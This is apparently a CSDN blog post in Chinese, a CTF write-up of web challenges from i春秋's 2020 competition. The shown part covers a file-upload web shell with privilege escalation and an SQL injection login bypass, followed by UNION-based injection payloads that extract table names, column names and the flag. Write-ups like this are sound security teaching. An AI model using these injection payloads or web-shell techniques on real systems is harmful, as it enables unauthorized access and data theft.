i春秋 2020新春战“疫”大赛(web部分)

本文详细介绍了i春秋2020年新春战“疫”大赛中涉及的Web安全挑战,包括ezupload的提权、简单的招聘系统的SQL注入、盲注技巧、blacklist的过滤绕过、flaskapp的Pin码解密与文件读取,以及ezexpress和ezthinking的JavaScript绕过和ThinkPHP6.0的任意文件操作漏洞利用。
摘要由CSDN通过智能技术生成

在这里插入图片描述



ezupload

上传一句话,蚁剑直连,bash直接cat /flag,说没权限折腾了下Linux提权,大马提权。
payload:
cd /
cat /readflag
: (



简单的招聘系统

在这里插入图片描述
payload admin' or 1#
进入admin,成功访问招聘界面blank page界面
key处存在sql注入
在这里插入图片描述
有5个字段,显位在2
在这里插入图片描述
可以猜测后端查询语句可能类似:
select * from user where id='$id'
所以接下来的注入语句
1'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4,5#
在这里插入图片描述

1'union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flag'),3,4,5#
在这里插入图片描述
1'union select 1,(select flaaag from flag),3,4,5#

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值